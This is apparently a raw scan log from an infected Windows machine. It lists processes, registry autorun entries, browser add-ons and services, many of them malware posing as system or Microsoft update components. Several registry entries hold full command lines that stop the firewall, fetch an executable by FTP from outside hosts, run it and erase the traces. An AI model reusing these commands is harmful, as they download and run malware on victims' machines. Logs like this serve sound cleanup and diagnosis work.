Code : Xwnx4MNhi20ODqm0RGLXfFFiRQ6M3x4NE0wCNZoM+ItTVzqcR5NW2g==

[00-PROCESS]**AdobeARM -/- C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
[00-PROCESS]**AvastSvc -/- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
[00-PROCESS]**CDASrv -/- C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
[00-PROCESS]**cz -/- C:\WINDOWS\ime\cz.exe
[00-PROCESS]**GrooveAuditService -/- C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe
[00-PROCESS]**GrooveMonitor -/- C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
[00-PROCESS]**HPWuSchd2 -/- C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
[00-PROCESS]**iexplore -/- C:\Program Files\Internet Explorer\iexplore.exe
[00-PROCESS]**jusched -/- C:\Program Files\Common Files\Java\Java Update\jusched.exe
[00-PROCESS]**MDM -/- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[00-PROCESS]**MonServiceUDisk -/- C:\Program Files\MBlaze UI\bin\MonServiceUDisk.exe
[00-PROCESS]**msmsgs -/- C:\Program Files\Messenger\msmsgs.exe
[00-PROCESS]**NeroCheck -/- C:\WINDOWS\system32\NeroCheck.exe
[00-PROCESS]**NokiaMServer -/- C:\Program Files\Common Files\Nokia\MPlatform\NokiaMServer.exe
[00-PROCESS]**ntvdm -/- C:\WINDOWS\system32\ntvdm.exe
[00-PROCESS]**nvsvc32 -/- C:\WINDOWS\system32\nvsvc32.exe
[00-PROCESS]**ODSERV -/- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
[00-PROCESS]**OSE -/- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
[00-PROCESS]**Rriqqhw -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe
[00-PROCESS]**RTHDCPL -/- C:\WINDOWS\RTHDCPL.EXE
[00-PROCESS]**RUNDLL32 -/- C:\WINDOWS\system32\RUNDLL32.EXE
[00-PROCESS]**SMSvcHost -/- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
[00-PROCESS]**spupdsvc -/- C:\WINDOWS\system32\spupdsvc.exe
[00-PROCESS]**sqlagent -/- C:\MSSQL7\binn\sqlagent.exe
[00-PROCESS]**sqlmangr -/- C:\MSSQL7\Binn\sqlmangr.exe
[00-PROCESS]**sqlservr -/- C:\MSSQL7\binn\sqlservr.exe
[00-PROCESS]**Squaaoq -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[00-PROCESS]**svchest -/- C:\WINDOWS\TEMP\svchest.exe
[00-PROCESS]**Tata Photon+ -/- C:\Program Files\Tata Photon+\Huawei\Tata Photon+.exe
[00-PROCESS]**TeamViewer -/- C:\Program Files\TeamViewer\Version7\TeamViewer.exe
[00-PROCESS]**TeamViewer_Desktop -/- c:\program files\teamviewer\version7\TeamViewer_Desktop.exe
[00-PROCESS]**tv_w32 -/- C:\Program Files\TeamViewer\Version7\tv_w32.exe
[00-PROCESS]**WJNews -/- C:\Program Files\Wuji\2013422\WJNews.exe
[00-PROCESS]**woai -/- C:\RECYCLER\woai.exe
[01-HKCUREG]** QQPCTray -/-
[01-HKCUREG]**360anfgg -/- C:\WINDOWS\java\hfs.exe
[01-HKCUREG]**360ank -/- C:\WINDOWS\Temp\wind.exe
[01-HKCUREG]**360anq5uan -/- C:\WINDOWS\Web\xggb.exe
[01-HKCUREG]**360anquan -/- C:\WINDOWS\system32\oobe\msobshel.exe
[01-HKCUREG]**360dfd -/- C:\WINDOWS\Temp\wind.exe
[01-HKCUREG]**360dffg -/- C:\WINDOWS\ime\cz.exe
[01-HKCUREG]**360dfg -/- C:\WINDOWS\ime\cz.exe
[01-HKCUREG]**360erd -/- C:\WINDOWS\Help\360zdf.exe
[01-HKCUREG]**360fghv -/- C:\WINDOWS\Web\wind.exe
[01-HKCUREG]**360fv -/- C:\WINDOWS\inf\360qa.exe
[01-HKCUREG]**360fy5zd -/- C:\WINDOWS\Web\xggb.exe
[01-HKCUREG]**360fyjhk -/- C:\WINDOWS\Temp\wind.exe
[01-HKCUREG]**360fyzd -/- C:\WINDOWS\system32\oobe\msobshel.exe
[01-HKCUREG]**360ggf -/- C:\WINDOWS\web\winxx.vbs
[01-HKCUREG]**360ghgh -/- C:\WINDOWS\Help\360nnd.exe
[01-HKCUREG]**360nnt -/- C:\WINDOWS\web\setup_open_2096.exe
[01-HKCUREG]**360onj -/- C:\WINDOWS\web\kuping_s_31088.exe
[01-HKCUREG]**360qm -/- C:\WINDOWS\inf\360qa.exe
[01-HKCUREG]**360safe -/- cmd /c net1 stop sharedaccess&echo open cie.s.3322.net  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1433pp.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1433pp.exe&del cmd.txt /q /f&del 1433pp.exe /q /f&exit
[01-HKCUREG]**360Safetray -/-
[01-HKCUREG]**360ss -/- C:\WINDOWS\Help\360zdf.exe
[01-HKCUREG]**360tye -/- C:\WINDOWS\Help\360nnd.exe
[01-HKCUREG]**360xxb -/- C:\WINDOWS\web\setup_open_2096.exe
[01-HKCUREG]**360xxd -/- C:\WINDOWS\web\ksbinstaller_s_66_53586.exe
[01-HKCUREG]**360xxm -/- C:\WINDOWS\web\kuping_s_31088.exe
[01-HKCUREG]**Adobe ARM -/- C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
[01-HKCUREG]**Ahnsdsv -/-
[01-HKCUREG]**Alcmtr -/- ALCMTR.EXE
[01-HKCUREG]**almon -/-
[01-HKCUREG]**APASSeru -/-
[01-HKCUREG]**Arcavir -/-
[01-HKCUREG]**ashDisp -/-
[01-HKCUREG]**Ashll -/- c:\windows\system32\dllcache\cmd.exe /c @echo open fm5566.publicvm.com>>cmd.txt&echo 123>>cmd.txt&echo xxx>>cmd.txt&echo get Whao.exe>> cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&Whao.exe&Whao.exe&del cmd.txt /q
[01-HKCUREG]**Authentium -/-
[01-HKCUREG]**authfw -/-
[01-HKCUREG]**avcenter -/-
[01-HKCUREG]**AVG -/-
[01-HKCUREG]**avgnt -/- C:\Program Files\Avira\AntiVir Desktop\avgnt.exe /min
[01-HKCUREG]**avire -/-
[01-HKCUREG]**avp -/-
[01-HKCUREG]**baidu -/- C:\WINDOWS\Web\chinaad.exe
[01-HKCUREG]**baidu1 -/- C:\WINDOWS\Web\union.exe
[01-HKCUREG]**baidu526 -/- C:\WINDOWS\Web\ksbinstaller_s_66_53586.exe
[01-HKCUREG]**baidu56 -/- C:\WINDOWS\Web\KAVSETUP_66_9862.exe
[01-HKCUREG]**baidu561 -/- C:\WINDOWS\Web\win.exe
[01-HKCUREG]**baidu56g -/- C:\WINDOWS\web\ksbinstaller_s_66_53586.exe
[01-HKCUREG]**baidu56ggf -/- C:\WINDOWS\addins\ksbinstaller_s_92_1.exe
[01-HKCUREG]**baidu56ggfd -/- C:\WINDOWS\ime\windo.exe
[01-HKCUREG]**baidu56ggfh -/- C:\WINDOWS\addins\NSSAD_66_1.exe
[01-HKCUREG]**baidu56jh -/- C:\WINDOWS\Web\window.exe
[01-HKCUREG]**baidu5u6g -/- C:\WINDOWS\web\setup_open_2096.exe
[01-HKCUREG]**baidu5u6gff -/- C:\WINDOWS\web\setup_open_3088.exe
[01-HKCUREG]**baidu5u6gffk -/- C:\WINDOWS\web\21101_lfylstp.exe
[01-HKCUREG]**BitDefender -/-
[01-HKCUREG]**bixushi -/- c:\windows\system32\csx.exe
[01-HKCUREG]**BoxNews_201372 -/- C:\Program Files\MusicPlayer\201372\BoxNews.exe -mini
[01-HKCUREG]**cao -/- c:\windows\system32\wbem\osinter.exe
[01-HKCUREG]**CDAServer -/- C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
[01-HKCUREG]**cfp -/-
[01-HKCUREG]**ClamAC -/-
[01-HKCUREG]**Comode -/-
[01-HKCUREG]**ctfmon.exe -/- C:\WINDOWS\system32\ctfmon.exe
[01-HKCUREG]**DR -/-
[01-HKCUREG]**dsa -/- C:\RECYCLER\woai.exe
[01-HKCUREG]**fasd -/- C:\RECYCLER\woai.exe
[01-HKCUREG]**fd2s -/- C:\WINDOWS\ime\cv.exe
[01-HKCUREG]**fd2sds -/- C:\WINDOWS\ime\taskmgr.exe
[01-HKCUREG]**fomon  -/-
[01-HKCUREG]**fsd32 -/- C:\WINDOWS\ime\cv.exe
[01-HKCUREG]**fsd3sw2 -/- C:\WINDOWS\ime\taskmgr.exe
[01-HKCUREG]**F-Secure -/-
[01-HKCUREG]**fssm32 -/-
[01-HKCUREG]**fstnod32 -/- c:\windows\addins\net.exe
[01-HKCUREG]**gent -/-
[01-HKCUREG]**ghdddhx -/- C:\WINDOWS\ime\cz.exe
[01-HKCUREG]**ghhx -/- C:\WINDOWS\ime\cv.exe
[01-HKCUREG]**GrooveMonitor -/- C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
[01-HKCUREG]**guaedxservice -/-
[01-HKCUREG]**HARDWARE -/-
[01-HKCUREG]**HP Software Update -/- C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
[01-HKCUREG]**Ikaeus -/-
[01-HKCUREG]**jhbc -/- C:\WINDOWS\ime\cv.exe
[01-HKCUREG]**jhbddc -/- C:\WINDOWS\ime\cz.exe
[01-HKCUREG]**kstnod32 -/- c:\windows\system32\csx.exe
[01-HKCUREG]**KVMON -/-
[01-HKCUREG]**KVXP -/-
[01-HKCUREG]**kxesc -/-
[01-HKCUREG]**kxetray -/-
[01-HKCUREG]**mcafee -/-
[01-HKCUREG]**McAfeeUpdaterUI -/-
[01-HKCUREG]**MHz -/-
[01-HKCUREG]**MSMSGS -/- C:\Program Files\Messenger\msmsgs.exe /background
[01-HKCUREG]**msseces -/-
[01-HKCUREG]**MusicPlayer_201372 -/- C:\Program Files\MusicPlayer\201372\MusicPlayer.exe -mini
[01-HKCUREG]**Navapsvc -/-
[01-HKCUREG]**NeroFilterCheck -/- C:\WINDOWS\system32\NeroCheck.exe
[01-HKCUREG]**NokiaMServer -/- C:\Program Files\Common Files\Nokia\MPlatform\NokiaMServer /watchfiles startup
[01-HKCUREG]**Norman -/-
[01-HKCUREG]**NvCplDaemon -/- RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dllNvStartup
[01-HKCUREG]**nvcsshed -/-
[01-HKCUREG]**NvMediaCenter -/- RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dllNvTaskbarInit
[01-HKCUREG]**nwiz -/- nwiz.exe /install
[01-HKCUREG]**pavfires -/-
[01-HKCUREG]**QQPCTray -/-
[01-HKCUREG]**RavMonD -/-
[01-HKCUREG]**RavTRAY -/-
[01-HKCUREG]**RISTRAY -/-
[01-HKCUREG]**RTHDCPL -/- RTHDCPL.EXE
[01-HKCUREG]**sched -/-
[01-HKCUREG]**sd -/- C:\RECYCLER\smss.exe
[01-HKCUREG]**SeekHack -/- c:\windows\system32\cmd.exe /c net1 stop sharedaccess&Title À¬»øÇåÀí&mode con cols=24 lines=2&echo open attack.5166.info > seek.hack&echo sql>> seek.hack&echo sql>> seek.hack&echo binary >> seek.hack&echo get Nod32.exe>> seek.hack&echo bye >> seek.hack&ft
[01-HKCUREG]**shabi -/- c:\windows\addins\net.exe
[01-HKCUREG]**shell -/- C:\windows\toolset.exe
[01-HKCUREG]**shell1 -/- c:\windows\system\windowsupdato.bat
[01-HKCUREG]**ShStatEXE -/-
[01-HKCUREG]**SohuVA -/- C:\Program Files\????\SHPlayer.exe /auto
[01-HKCUREG]**sophos -/-
[01-HKCUREG]**SPIDer -/-
[01-HKCUREG]**Sunbelt -/-
[01-HKCUREG]**SunJavaUpdateSched -/- C:\Program Files\Common Files\Java\Java Update\jusched.exe
[01-HKCUREG]**TMBMSRV -/-
[01-HKCUREG]**VeohPlugin -/- C:\Program Files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
[01-HKCUREG]**vsserv -/-
[01-HKCUREG]**WEB -/-
[01-HKCUREG]**WJNews_2013422 -/- C:\Program Files\Wuji\2013422\WJNews.exe -mini
[01-HKCUREG]**xue -/- C:\RECYCLER\csrss.exe
[01-HKCUREG]**xuego1u -/- C:\WINDOWS\Web\xggb.exe
[01-HKCUREG]**xuegou -/- C:\WINDOWS\Help\360zdf.exe
[01-HKCUREG]**yige -/- c:\windows\system32\wbem\explore.exe
[01-HKCUREG]**zhouhongyi -/- c:\windows\java\net1.exe
[02-HKLMREG]** QQPCTray -/-
[02-HKLMREG]**360anfgg -/- C:\WINDOWS\java\hfs.exe
[02-HKLMREG]**360ank -/- C:\WINDOWS\Temp\wind.exe
[02-HKLMREG]**360anq5uan -/- C:\WINDOWS\Web\xggb.exe
[02-HKLMREG]**360anquan -/- C:\WINDOWS\system32\oobe\msobshel.exe
[02-HKLMREG]**360dfd -/- C:\WINDOWS\Temp\wind.exe
[02-HKLMREG]**360dffg -/- C:\WINDOWS\ime\cz.exe
[02-HKLMREG]**360dfg -/- C:\WINDOWS\ime\cz.exe
[02-HKLMREG]**360erd -/- C:\WINDOWS\Help\360zdf.exe
[02-HKLMREG]**360fghv -/- C:\WINDOWS\Web\wind.exe
[02-HKLMREG]**360fv -/- C:\WINDOWS\inf\360qa.exe
[02-HKLMREG]**360fy5zd -/- C:\WINDOWS\Web\xggb.exe
[02-HKLMREG]**360fyjhk -/- C:\WINDOWS\Temp\wind.exe
[02-HKLMREG]**360fyzd -/- C:\WINDOWS\system32\oobe\msobshel.exe
[02-HKLMREG]**360ggf -/- C:\WINDOWS\web\winxx.vbs
[02-HKLMREG]**360ghgh -/- C:\WINDOWS\Help\360nnd.exe
[02-HKLMREG]**360nnt -/- C:\WINDOWS\web\setup_open_2096.exe
[02-HKLMREG]**360onj -/- C:\WINDOWS\web\kuping_s_31088.exe
[02-HKLMREG]**360qm -/- C:\WINDOWS\inf\360qa.exe
[02-HKLMREG]**360safe -/- cmd /c net1 stop sharedaccess&echo open cie.s.3322.net  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1433pp.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1433pp.exe&del cmd.txt /q /f&del 1433pp.exe /q /f&exit
[02-HKLMREG]**360Safetray -/-
[02-HKLMREG]**360ss -/- C:\WINDOWS\Help\360zdf.exe
[02-HKLMREG]**360tye -/- C:\WINDOWS\Help\360nnd.exe
[02-HKLMREG]**360xxb -/- C:\WINDOWS\web\setup_open_2096.exe
[02-HKLMREG]**360xxd -/- C:\WINDOWS\web\ksbinstaller_s_66_53586.exe
[02-HKLMREG]**360xxm -/- C:\WINDOWS\web\kuping_s_31088.exe
[02-HKLMREG]**Adobe ARM -/- C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
[02-HKLMREG]**Ahnsdsv -/-
[02-HKLMREG]**Alcmtr -/- ALCMTR.EXE
[02-HKLMREG]**almon -/-
[02-HKLMREG]**APASSeru -/-
[02-HKLMREG]**Arcavir -/-
[02-HKLMREG]**ashDisp -/-
[02-HKLMREG]**Ashll -/- c:\windows\system32\dllcache\cmd.exe /c @echo open fm5566.publicvm.com>>cmd.txt&echo 123>>cmd.txt&echo xxx>>cmd.txt&echo get Whao.exe>> cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&Whao.exe&Whao.exe&del cmd.txt /q
[02-HKLMREG]**Authentium -/-
[02-HKLMREG]**authfw -/-
[02-HKLMREG]**avcenter -/-
[02-HKLMREG]**AVG -/-
[02-HKLMREG]**avgnt -/- C:\Program Files\Avira\AntiVir Desktop\avgnt.exe /min
[02-HKLMREG]**avire -/-
[02-HKLMREG]**avp -/-
[02-HKLMREG]**baidu -/- C:\WINDOWS\Web\chinaad.exe
[02-HKLMREG]**baidu1 -/- C:\WINDOWS\Web\union.exe
[02-HKLMREG]**baidu526 -/- C:\WINDOWS\Web\ksbinstaller_s_66_53586.exe
[02-HKLMREG]**baidu56 -/- C:\WINDOWS\Web\KAVSETUP_66_9862.exe
[02-HKLMREG]**baidu561 -/- C:\WINDOWS\Web\win.exe
[02-HKLMREG]**baidu56g -/- C:\WINDOWS\web\ksbinstaller_s_66_53586.exe
[02-HKLMREG]**baidu56ggf -/- C:\WINDOWS\addins\ksbinstaller_s_92_1.exe
[02-HKLMREG]**baidu56ggfd -/- C:\WINDOWS\ime\windo.exe
[02-HKLMREG]**baidu56ggfh -/- C:\WINDOWS\addins\NSSAD_66_1.exe
[02-HKLMREG]**baidu56jh -/- C:\WINDOWS\Web\window.exe
[02-HKLMREG]**baidu5u6g -/- C:\WINDOWS\web\setup_open_2096.exe
[02-HKLMREG]**baidu5u6gff -/- C:\WINDOWS\web\setup_open_3088.exe
[02-HKLMREG]**baidu5u6gffk -/- C:\WINDOWS\web\21101_lfylstp.exe
[02-HKLMREG]**BitDefender -/-
[02-HKLMREG]**bixushi -/- c:\windows\system32\csx.exe
[02-HKLMREG]**BoxNews_201372 -/- C:\Program Files\MusicPlayer\201372\BoxNews.exe -mini
[02-HKLMREG]**cao -/- c:\windows\system32\wbem\osinter.exe
[02-HKLMREG]**CDAServer -/- C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
[02-HKLMREG]**cfp -/-
[02-HKLMREG]**ClamAC -/-
[02-HKLMREG]**Comode -/-
[02-HKLMREG]**ctfmon.exe -/- C:\WINDOWS\system32\ctfmon.exe
[02-HKLMREG]**DR -/-
[02-HKLMREG]**dsa -/- C:\RECYCLER\woai.exe
[02-HKLMREG]**fasd -/- C:\RECYCLER\woai.exe
[02-HKLMREG]**fd2s -/- C:\WINDOWS\ime\cv.exe
[02-HKLMREG]**fd2sds -/- C:\WINDOWS\ime\taskmgr.exe
[02-HKLMREG]**fomon  -/-
[02-HKLMREG]**fsd32 -/- C:\WINDOWS\ime\cv.exe
[02-HKLMREG]**fsd3sw2 -/- C:\WINDOWS\ime\taskmgr.exe
[02-HKLMREG]**F-Secure -/-
[02-HKLMREG]**fssm32 -/-
[02-HKLMREG]**fstnod32 -/- c:\windows\addins\net.exe
[02-HKLMREG]**gent -/-
[02-HKLMREG]**ghdddhx -/- C:\WINDOWS\ime\cz.exe
[02-HKLMREG]**ghhx -/- C:\WINDOWS\ime\cv.exe
[02-HKLMREG]**GrooveMonitor -/- C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
[02-HKLMREG]**guaedxservice -/-
[02-HKLMREG]**HARDWARE -/-
[02-HKLMREG]**HP Software Update -/- C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
[02-HKLMREG]**Ikaeus -/-
[02-HKLMREG]**jhbc -/- C:\WINDOWS\ime\cv.exe
[02-HKLMREG]**jhbddc -/- C:\WINDOWS\ime\cz.exe
[02-HKLMREG]**kstnod32 -/- c:\windows\system32\csx.exe
[02-HKLMREG]**KVMON -/-
[02-HKLMREG]**KVXP -/-
[02-HKLMREG]**kxesc -/-
[02-HKLMREG]**kxetray -/-
[02-HKLMREG]**mcafee -/-
[02-HKLMREG]**McAfeeUpdaterUI -/-
[02-HKLMREG]**MHz -/-
[02-HKLMREG]**MSMSGS -/- C:\Program Files\Messenger\msmsgs.exe /background
[02-HKLMREG]**msseces -/-
[02-HKLMREG]**MusicPlayer_201372 -/- C:\Program Files\MusicPlayer\201372\MusicPlayer.exe -mini
[02-HKLMREG]**Navapsvc -/-
[02-HKLMREG]**NeroFilterCheck -/- C:\WINDOWS\system32\NeroCheck.exe
[02-HKLMREG]**NokiaMServer -/- C:\Program Files\Common Files\Nokia\MPlatform\NokiaMServer /watchfiles startup
[02-HKLMREG]**Norman -/-
[02-HKLMREG]**NvCplDaemon -/- RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dllNvStartup
[02-HKLMREG]**nvcsshed -/-
[02-HKLMREG]**NvMediaCenter -/- RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dllNvTaskbarInit
[02-HKLMREG]**nwiz -/- nwiz.exe /install
[02-HKLMREG]**pavfires -/-
[02-HKLMREG]**QQPCTray -/-
[02-HKLMREG]**RavMonD -/-
[02-HKLMREG]**RavTRAY -/-
[02-HKLMREG]**RISTRAY -/-
[02-HKLMREG]**RTHDCPL -/- RTHDCPL.EXE
[02-HKLMREG]**sched -/-
[02-HKLMREG]**sd -/- C:\RECYCLER\smss.exe
[02-HKLMREG]**SeekHack -/- c:\windows\system32\cmd.exe /c net1 stop sharedaccess&Title À¬»øÇåÀí&mode con cols=24 lines=2&echo open attack.5166.info > seek.hack&echo sql>> seek.hack&echo sql>> seek.hack&echo binary >> seek.hack&echo get Nod32.exe>> seek.hack&echo bye >> seek.hack&ft
[02-HKLMREG]**shabi -/- c:\windows\addins\net.exe
[02-HKLMREG]**shell -/- C:\windows\toolset.exe
[02-HKLMREG]**shell1 -/- c:\windows\system\windowsupdato.bat
[02-HKLMREG]**ShStatEXE -/-
[02-HKLMREG]**SohuVA -/- C:\Program Files\????\SHPlayer.exe /auto
[02-HKLMREG]**sophos -/-
[02-HKLMREG]**SPIDer -/-
[02-HKLMREG]**Sunbelt -/-
[02-HKLMREG]**SunJavaUpdateSched -/- C:\Program Files\Common Files\Java\Java Update\jusched.exe
[02-HKLMREG]**TMBMSRV -/-
[02-HKLMREG]**VeohPlugin -/- C:\Program Files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
[02-HKLMREG]**vsserv -/-
[02-HKLMREG]**WEB -/-
[02-HKLMREG]**WJNews_2013422 -/- C:\Program Files\Wuji\2013422\WJNews.exe -mini
[02-HKLMREG]**xue -/- C:\RECYCLER\csrss.exe
[02-HKLMREG]**xuego1u -/- C:\WINDOWS\Web\xggb.exe
[02-HKLMREG]**xuegou -/- C:\WINDOWS\Help\360zdf.exe
[02-HKLMREG]**yige -/- c:\windows\system32\wbem\explore.exe
[02-HKLMREG]**zhouhongyi -/- c:\windows\java\net1.exe
[03-BHOCLSD]**avast! WebRep -/- C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll -/- {8E5E2654-AD2D-48bf-AC2D-D17F00898D06}
[03-BHOCLSD]**CSohuDetector Object -/- C:\Program Files\搜狐影音\SoHuAutoDetector.dll -/- {452ADB5B-00BE-469D-A65F-3046146B2ED5}
[03-BHOCLSD]**Groove GFS Browser Helper -/- C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll -/- {72853161-30C5-4D22-B7F9-0BBC1D38A37E}
[03-BHOCLSD]**Java(tm) Plug-In 2 SSV Helper -/- C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll -/- {DBC80044-A445-435b-BC74-9C25C1C588A9}
[03-BHOCLSD]**Java(tm) Plug-In SSV Helper -/- C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll -/- {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
[04-TOOLBAR]**avast! WebRep -/- C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll -/- {8E5E2654-AD2D-48bf-AC2D-D17F00898D06}
[04-TOOLBAR]**N.A -/- N.A -/- 10
[04-TOOLBAR]**Veoh Video Compass -/- C:\Program Files\Veoh Networks\Veoh Video Compass\SearchRecsPlugin.dll -/- {52836EB0-631A-47B1-94A6-61F9D9112DAE}
[05-SERVICE]**123 -/- 123456 -/- C:\WINDOWS\System32\svchost.exe -/- C:\WINDOWS\system32\RbmothC.dll
[05-SERVICE]**avast! Antivirus -/- avast! Antivirus -/- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
[05-SERVICE]**Cirdiy makoma -/- Usmwcs ygkeaoeu -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**clr_optimization_v2.0.50727_86 -/- Microsoft .NET Framework NGEN v2.0.50727_X32 -/- Rundll32.exe C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Data.Sql.dllstart
[05-SERVICE]**Czrwsc oaqmoa -/- Gioeyi cuqwamwg -/- C:\WINDOWS\Kingsoft.com
[05-SERVICE]**GamingWonderlandService -/- GamingWonderlandService -/- C:\PROGRA~1\GAMING~2\bar\1.bin\gtbarsvc.exe
[05-SERVICE]**HWDeviceService.exe -/- HWDeviceService.exe -/- C:\Documents and Settings\Administrator\Application Data\DatacardService\HWDeviceService.exe -/service
[05-SERVICE]**Igmdfa warfta -/- Qtmpis udscaspp -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**Iqxpgs waoewa -/- Cuwkiu syoqaeqc -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**Irmon -/- Infrared Monitor -/- C:\WINDOWS\system32\svchost.exe -/- C:\WINDOWS\System32\irmon.dll
[05-SERVICE]**JavaQuickStarterService -/- Java Quick Starter -/- C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jqs.exe -service -config C:\Program Files\Oracle\JavaFX 2.1 Runtime\lib\deploy\jqs\jqs.conf
[05-SERVICE]**MDM -/- Machine Debug Manager -/- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[05-SERVICE]**MediabCentero -/- MS Median Controlm Centerx -/- C:\WINDOWS\System32\svchost.exe -/- C:\WINDOWS\system32\RimntcC.cc3
[05-SERVICE]**MediaqCenterl -/- MS Mediad Controlc Centere -/- \RjqjzJ .exe
[05-SERVICE]**Microsoft Office Groove Audit Service -/- Microsoft Office Groove Audit Service -/- C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe
[05-SERVICE]**Microsoft Updatemgt.exe -/- Microsoft Updateloy Software is private services -/- C:\Program Files\Internet Explorer\nfnujf.exe
[05-SERVICE]**Microsoft Updateokd.exe -/- Microsoft Updatebga Software is private services -/- C:\Program Files\Internet Explorer\gdutcl.exe
[05-SERVICE]**MozillaMaintenance -/- Mozilla Maintenance Service -/- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
[05-SERVICE]**Mrdues uaysga -/- Krsgog ixwcauck -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**MSSQLServer -/- MSSQLServer -/- C:\MSSQL7\binn\sqlservr.exe
[05-SERVICE]**msupdate -/- Microsoft security update service -/- c:\windows\system32\mssrv32.exe
[05-SERVICE]**MSUpdqtebjf -/- Microsoft Windows Uqdatentr Service -/- C:\Program Files\saeiac.exe
[05-SERVICE]**MSUpdqtecko -/- Microsoft Windows Uqdateewi Service -/- C:\Program Files\sakuwk.exe
[05-SERVICE]**MSUpdqtehrd -/- Microsoft Windows Uqdatedah Service -/- C:\Program Files\ssigss.exe
[05-SERVICE]**MSUpdqtelqf -/- Microsoft Windows Uqdatejwx Service -/- C:\Program Files\xsplsy.exe
[05-SERVICE]**MSUpdqterui -/- Microsoft Windows Uqdatewua Service -/- C:\Program Files\kokaoo.exe
[05-SERVICE]**MSUpdqtesqi -/- Microsoft Windows Uqdatejtk Service -/- C:\Program Files\qoyiki.exe
[05-SERVICE]**Natiaonal Safe Meadi -/- Natiaonal Safe Meadi Service -/- C:\WINDOWS\TEMP\\svchest.exe
[05-SERVICE]**Nationaljgr -/- Nationalhhf Instruments Domain Service -/- C:\Documents and Settings\UserData.exe
[05-SERVICE]**netscvre -/- NT LM Security Support Providers -/- C:\WINDOWS\system32\oysmqo.exe
[05-SERVICE]**NVSvc -/- NVIDIA Display Driver Service -/- C:\WINDOWS\system32\nvsvc32.exe
[05-SERVICE]**Ocgqrc uaziaa -/- Ukmfnu wgwumunb -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**odserv -/- Microsoft Office Diagnostics Service -/- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
[05-SERVICE]**ose -/- Office Source Engine -/- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
[05-SERVICE]**qiliycdj -/- qiliycdj -/- C:\WINDOWS\qiliycdj.LOG
[05-SERVICE]**QWWAkwfQ -/- jGgWvv KVQhTpMsI -/- C:\WINDOWS\system32\i8013\F001.exe
[05-SERVICE]**Qwybbo qazlna -/- Gtgruw inaaaynf -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe
[05-SERVICE]**Reliance Netconnect. RunOuc -/- Reliance Netconnect. OUC -/- C:\Program Files\Reliance Netconnect+\UpdateDog\ouc.exe
[05-SERVICE]**rfUanvrm -/- SuElKo tJoxiimmm -/- C:\WINDOWS\system32\i8013\D001.exe
[05-SERVICE]**ServiceLayer -/- ServiceLayer -/- C:\Program Files\Nokia\PC Connectivity Solution\ServiceLayer.exe
[05-SERVICE]**SPOOLSVC -/- SPOOLSVC -/- C:\Program Files\Common Files\System\sdb.exe
[05-SERVICE]**spupdsvc -/- Windows Service Pack Installer update service -/- C:\WINDOWS\system32\spupdsvc.exe
[05-SERVICE]**SQLServerAgent -/- SQLServerAgent -/- C:\MSSQL7\binn\sqlagent.exe
[05-SERVICE]**Szqwsi cawkqa -/- Ldqmys ygkeaoeu -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe
[05-SERVICE]**UDisk Monitor -/- UDisk Monitor -/- C:\Program Files\MBlaze UI\bin\MonServiceUDisk.exe
[05-SERVICE]**Ukylrc gacrda -/- Gsqodv iwqaxyhb -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe
[05-SERVICE]**Visual Studio Analyzer RPC bridge -/- Visual Studio Analyzer RPC bridge -/- C:\Program Files\Microsoft Visual Studio\Common\Tools\VS-Ent98\Vanalyzr\varpc.exe
